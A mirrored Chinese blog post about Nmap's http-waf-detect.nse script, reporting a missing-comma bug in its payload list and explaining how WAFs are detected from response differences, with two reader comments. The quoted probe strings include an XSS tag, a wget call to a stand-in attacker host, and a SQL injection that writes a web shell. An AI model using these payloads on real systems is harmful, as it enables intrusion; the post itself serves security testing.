3

[zz]http-waf-detect.nse

 3 years ago
source link: https://evilcos.me/?p=63
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

EVILCOS

//:alert(/Hacking Symbol/)//余弦

Search

[zz]http-waf-detect.nse

http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse

测试了下有个bug会引起执行失败:

“?p4yl04d=<img src=”x” alt=”” />”, “?p4yl04d=wget http://ev1l.com/xpl01t.txt”
“?p4yl04d=UNION SELECT ”,2,3 INTO OUTFILE ‘/var/www/w3bsh3ll.php’ –“}

“?p4yl04d=<img src=”x” alt=”” />”, “?p4yl04d=wget http://ev1l.com/xpl01t.txt”,
“?p4yl04d=UNION SELECT ”,2,3 INTO OUTFILE ‘/var/www/w3bsh3ll.php’ –“}

少一个逗号- -。

效果出来了,原理很简单,部署WAF的网站,发送一些网站本身不包含的一些参数键值对,网站一般情况下不会出现任何异常,而WAF会报警,响应会出现差异。基于这些差异进行判断就行。不过这个nse脚本判断机制似乎太简单了。

About 余弦

一个符号而已 View all posts by 余弦 →

2 comments

  1. 7c7a7e0d3179803550e8c35ad4a9324a?s=80&d=retro&r=g咖啡

    我认为要对具体品牌的waf做针对性的测试,要跟waf具体的配置走,被动性比较大,实现较通用的探测误报又太高。

  2. f562ffe3ce026981f54a75d0364328b3?s=80&d=retro&r=g余弦

    哈哈,非常有意思,waf的人在想办法识别各种扫描器与攻击工具,做扫描器与攻击攻击的人又在想各种waf的差异识别。

发表评论 取消回复

电子邮件地址不会被公开。 必填项已用*标注

评论

姓名 *

电子邮件 *

站点

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

Proudly powered by WordPress. Theme: Flat 1.7.11 by Themeisle.

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK